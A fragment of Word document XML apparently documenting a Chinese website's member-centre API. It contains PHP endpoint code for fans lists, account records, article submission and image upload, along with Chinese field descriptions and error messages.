        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904DB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data.username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>粉丝名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7094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data.img      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>粉丝头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF31F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{Integer} data.follow  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否已经关注该会员：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902E4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错误信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0774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errcode     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误状态码（</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>222</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：用户未登录）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C078D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C06B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fans()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DEE6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32AA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDF2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$where['gz_uid'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA1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87936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D1CB3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请先登录账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3124B0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678317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2D34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517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$fans_ids = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC1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$page = input('param.page', 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C59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 input('param.per_page', 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B15E0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 = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61405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-&gt;field('uid')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0F3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-&gt;where($where)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8FA6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-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAE3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(count($fans) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292AAE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($fans as $fans_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656A4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$fans_ids[] = $fans_member['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A70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8C42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 = Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD5EB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'in', $fans_ids)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB4FF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-&gt;paginate($per_page, false, ['page' =&gt; $page,])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6C7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-&gt;toArray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C31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(count($fans_members['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CB4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($fans_members['data'] as $key =&gt; $fans_member) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F4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($fans_member['nickname']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DBD5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$fans_members['data'][$key]['username'] = $fans_member['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C889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($fans_member['user']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E114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$fans_members['data'][$key]['username'] = $fans_member['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490000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($fans_member['mobile']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021B5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$fans_members['data'][$key]['username'] = substr($fans_member['mobile'], 0, 3) . '****' . substr($fans_member['mobile'], 7, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4840BE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($fans_member['email']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D40B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$fans_members['data'][$key]['username'] = $fans_member['email'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD536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1A9D7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$fans_members['data'][$key]['username'] = '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . _userName_id($fans_member['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7BC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942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$fans_members['data'][$key]['img'] = $fans_member['img'] ? _imgUrl() . $fans_member['img'] : '/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BCDA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$fans_members['data'][$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560BE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$fans_members['data'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F441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-&gt;where('gz_uid', $fans_member['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5588E7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0033C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-&gt;count('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0569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A15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1596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A426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$fans_members = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F3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 =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E235E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'per_page' =&gt; 6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEF0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'current_page' =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB6A6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=&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5615A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3B50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9335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json($fans_members);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48744C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99E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records()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA0ED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BDC6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 input('param.money') ? input('param.money') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D804F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$type = input('param.type') ? input('param.type') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DC2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input('param.data') ? input('param.data') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1E8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 ? input('param.pages') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366E9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 = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B41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($money) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADE0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($money == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07956B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 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58E0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EB5AD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 = $money;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5D5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645E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8002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22EA1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 = $type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACB81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4194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3AF4CD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$where['data'] = $data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7832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4647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452083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Db::name('member_records')-&gt;where($where)-&gt;order('id desc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F43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['money' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 'score' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>积分</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>', 'jingyan' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经验值</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466A1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6E824C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($v['money']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADB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$data['data'][$k]['text'] = $v['text'] . ' &lt;b id="data1"&gt;' . $v['data'] . '&lt;/b&gt;&lt;b id="data2"&gt;' . $v['money'] . '&lt;/b&gt; ' . $type[$v['type']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA748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A56C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$data['data'][$k]['date'] = date('Y-m-d H:i:s', $v['time']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4765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114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0DF67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7DBE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articleAdd()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A052B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355C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$aritlceId = input('id/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD68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DB::name('member_config')-&gt;where("name='articleAdd' or name='articleHide' or name='articleScore' or name='articleNum' or name='articleCode' or name='articleJingyan' or name='articleMoney'")-&gt;fetchSql(false)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539EFA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$articleAdd = $data['0']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15038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$articleHide = $data['1']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A71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$articleScore = $data['2']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D4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$articleNum = $data['3']['text'];     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ABA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$articleCode = $data['4']['text'];    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643663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$articleJingyan = $data['5']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B28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$articleMoney = $data['6']['text'];   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5AC3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40FB5E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($articleAdd == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674FF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184C3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文章投稿已关闭</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5FAD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0A83A9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0E8E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8653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($articleHide == '-1') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7933DA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$where['hide'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554D4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0229E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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B37A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906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5C8A87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 input('param.title', '', 'strip_tags') ? input('param.title', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980BA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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71F4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$where['title'] = $title;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C97B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8436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 input('param.mychannel/d') ? input('param.mychannel/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718F9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 1 || $mychannel == 2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54216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input('param.images') ? input('param.images') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203822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($images) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2499E9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$where['images'] = $images;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F936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json_decode(htmlspecialchars_decode($images), true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146A69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($img) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515977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 = $img[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C96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59AD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59B6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($mychannel == 3 || $mychannel == 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B131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($mychannel == 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4F8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(!$title) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59803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810B1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标题不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2381B4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1FA5B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932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3284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1546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 = input('param.video') ? input('param.video') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014579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$videourl = input('param.videourl') ? input('param.videourl') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6151DE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$where['qiniu_video'] = $video;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE09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$where['qiniu_video_type'] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6868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$where['qiniu_video'] = $video;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36833B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$where['video'] = $videourl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638831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ADEE9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54C372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0C0E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$description = input('param.description', '', 'strip_tags') ? input('param.description', '', 'strip_tags') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C31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($description) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191B6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$where['description'] = $description;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBC1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3FB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$mychannel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB419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54559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724E03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'max:80',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F815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'description' =&gt; 'max:250',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CE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=&gt; 'require|number|in:1,2,3,4',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327C6B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2D12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5E1C8B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$title,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818B5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'description' =&gt; $description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE65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=&gt; $mychannel,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6B4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0DAE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43E7AA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977C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7351D0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24BE4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BF24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DAF3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($articleCode == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB05E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$yzm = input('param.yzm/d') ? input('param.yzm/d') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C22E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($yzm) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B9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(!captcha_check($yzm)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB60F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268D3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验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124305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303,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3035AA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D71B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3919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189C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5EC46E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请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E147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D87AB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BE32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A982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0F18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(!$aritlceId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E18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$where['update_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BF1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$where['des'] = 50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7156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$where['flags'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C84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$where['click'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68176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$where['create_time'] = $time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED60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01A095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 $mychannel == 4 ? 0 : 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881B1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Db::name('article')-&gt;insertGetId($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728F5F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($where['hide'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01615F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($articleMoney) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D6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'money',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70D2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(!$aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09420D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$articleMoney, 'money', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FB08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$this-&gt;memberId)-&gt;setInc('money', $articleMoney);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70EF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A4E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CE93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($articleScore) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110822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'score',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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001497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(!$aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2D0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$articleScore, 'score', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E392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$this-&gt;memberId)-&gt;setInc('score', </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$articleScore);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127C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5454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326D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($articleJingyan) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649DDB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$aritlcejiance = Db::name('member_records')-&gt;where(['type' =&gt; 'jingyan', 'text' =&gt;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'data' =&gt; '+'])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F7A7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(!$aritlcejiance) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED87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投稿奖励</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$articleJingyan, 'jingyan', '+');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7470D7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$this-&gt;memberId)-&gt;setInc('jingyan', $articleJingyan);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814D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77C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1454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 '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>自动审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01C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发布成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221F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D22A0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$id . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A1F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发布成功，等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B3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285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55DA6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Db::name('article')-&gt;where(['id' =&gt; $aritlceId, 'uid' =&gt; $this-&gt;memberId])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8C9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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50120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5F20BA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非法修改</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AD29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213,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1CA6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1E09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DC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 $article)-&gt;update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317B0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3EE72F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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F3E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CF1A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($where['hide'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E23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$article . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功，自动审核通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A6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39B2FE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修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D22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147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08D53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投稿文章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$article . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功，等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C31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4FECEC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修改成功，等待审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3EE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B06C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3CC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F5D7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A6AC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A791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imagesUpload()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D88D5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7077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569EF5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2B441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(!$filePath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA99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44DD75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非法操作</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF25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3334A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3B4D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1924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24939B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$geshi = ['jpg', 'png', 'gif', 'jpeg', 'JPEG', 'JPG', 'GIF', 'PNG'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD000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(!in_array($ext, $geshi)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA188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3114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图片格式不对，请换张图片吧</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C23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D6861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7F95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9C37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substr(md5($file-&gt;getRealPath()), 0, 5) . date('YmdHis') . rand(100, 999999) . '.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511586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41C434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1F1671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3B051A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4DD642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2FB72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217206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2E5FEF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31711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59B35A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50A877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9EC2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$err,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2299C6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006379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28A3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9255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9527D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$ret['key'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C926C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4ADC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FAAC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DB621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request()-&gt;file('image');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30ED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$info = $file-&gt;validate(['size' =&gt; 105678, 'ext' =&gt; 'jpg,png,gif,jpeg'])-&gt;move(ROOT_PATH . 'public' . DS . 'uploads' . DS . 'weitoutiao' . DS . 'images');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315BB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($info) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6D4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'/public/uploads/weitoutiao/images/' . $info-&gt;getSaveName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCD32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str_replace('\\', '/', $img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141DD0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6CAB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$img,</w:t>
      </w:r>
    </w:p>
